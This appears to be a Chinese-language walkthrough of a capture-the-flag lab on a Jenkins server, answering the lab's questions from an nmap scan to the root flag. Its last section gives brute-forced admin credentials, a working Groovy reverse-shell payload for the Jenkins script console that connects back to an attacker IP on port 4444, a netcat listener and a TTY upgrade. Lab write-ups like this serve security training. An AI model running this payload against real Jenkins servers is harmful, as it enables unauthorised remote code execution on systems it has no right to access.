一、首字母缩略词 CVE 代表什么?
1
Common Vulnerabilities and Exposures
二、在网络安全中,CIA指的是什么?
1
2
#信息安全三要素,机密性,完整性,可用性
Confidentiality, Integrity, Availability
三、端口 8080 上运行的服务版本是什么?
1
2
3
#nmap扫描IP
nmap -sC -sV IP
Jetty 9.4.39.v20210325

image-20230314154438068

四、目标上运行的是哪个版本的 Jenkins?
1
2
3
#使用curl命令或者目录爆破
curl -v http://ip:port
2.289.1

image-20230314154831206

五、什么类型的脚本在 Jenkins 脚本控制台上被接受为输入?
1
2
#Groovy是一种基于Java平台的面向对象语言。
groovy
六、如果目标虚拟机运行的是Windows,Groovy 脚本代码段中的“String cmd”变量等于什么?
1
cmd.exe
七、与我们可以用来在 Linux 上显示网络接口信息的“ip a”有什么不同的命令?
1
ifconfig
八、哪个开关可以让我们在netcat 上使用UDP传输模式?
1
-u
九、用于描述使目标主机启动与攻击者主机的连接的术语是什么?
1
reverse shell
十、提交root flag
1
2
3
4
5
6
7
8
9
10
11
12
#使用burp进行用户名,密码爆破
root,password
#在manage-script-console中写入payload
String host="IP";
int port=4444;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
#启动监听
nc -lvvp 4444
#升级为ttyshell
SHELL=/bin/bash script -q /dev/null
cat /root/flag.txt

image-20230314170911498

image-20230314224013599